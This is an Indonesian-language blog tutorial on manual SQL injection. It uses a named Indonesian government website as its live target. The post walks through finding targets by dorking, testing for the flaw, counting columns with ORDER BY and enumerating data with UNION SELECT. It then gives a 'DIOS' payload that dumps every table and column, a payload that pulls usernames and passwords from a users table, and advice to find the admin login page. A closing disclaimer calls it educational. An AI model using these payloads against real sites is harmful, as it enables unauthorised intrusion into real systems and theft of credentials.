
Tutorial SQL Injection Manual

Add Comments
Friday, April 3, 2020
Tutorial SQL Injection manual
Oke Guyss kali ini saya mau share tutorial SQL Injection manual
Sebelum itu siapin dulu bahan-bahannya oke...
~ Hp
~ Kuota internet
~ Dork
~ Kegantengan juga ngaruh loh...
Pertama kalian Dorking dulu kalo kalian nggak punya dork bisa cari di google banyak
Karna disini saya sudah punya target jadi langsung aja oke....
Dan ini Target saya
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33
Kalian cek dulu websitenya apakah rentan terhadap SQLi atau tidak
Cara cek nya guampang banget kalian kasih tanda ' itu di belakang nya
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'
Di belakangnya ya...
Sebelum..
Nah kalo blank website berarti vulnerability terhadap SQLi
Abis itu kita tambahin string -- - kek gitu pasti web nya jadi gak blank lagi :)
Tinggal kita cari berapa column di web nya :v
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 1-- -
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 2-- -
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 3-- -
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'order by 4-- -
Di angka 4 web saya blank lagi berarti column nya adalah 4
Ganti order by nya jadi union select
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,2,3,4-- -
Nanti akan keluar angka ajaib seperti ini...
keluar angka 2 dan 4 kalian bisa pilih salah satu..
berikut beberapa command SQLi
user()
database()
@@version
@@hostname
@@datadir
Kalian tinggal pilih command diatas nya
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,user(),3,4-- -
Langsung biar Gak lama kasih Dios nya
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=33'Union Select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4-- -
Kalian taro Dios nya di angka ajaib nya nanti akan seperti ini
(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x)
http://karimun.karantina.pertanian.go.id/informasilayanan.php?id=-33'Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),3,4-- -
Nanti akan seperti ini...
Dan jangan lupa cari adlog nya :)
#Konten Ini Hanya Untuk Pembelajaran (Pengetahuan Semata) #Mohon Untuk Tidak Melakukanya, Kami Tidak Akan Bertanggung Jawab Atas Tindakan Hacking Apapun Yang Kalian Lakukan..!!!
mntaap tp gk bisa gw bjiir :v
ReplyDelete